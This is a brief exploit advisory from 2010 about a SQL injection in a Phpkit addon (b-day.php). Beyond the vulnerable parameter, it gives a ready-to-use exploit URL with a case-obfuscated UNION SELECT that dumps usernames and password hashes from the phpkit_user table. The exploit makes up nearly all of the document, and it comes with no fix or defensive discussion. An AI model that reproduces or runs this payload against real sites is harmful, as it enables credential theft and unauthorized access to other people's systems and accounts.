.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
~ Phpkit addon (b-day.php) SQL Injection Vulnerability ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: n3w7u
[+] Vulnerabilities [ SQL Injection ]
[+] Language: [ PHP ]
[+] Date: 22.03.2010
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
include.php?path=b-day.php&ausgabe=
[+] Exploitable
http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--
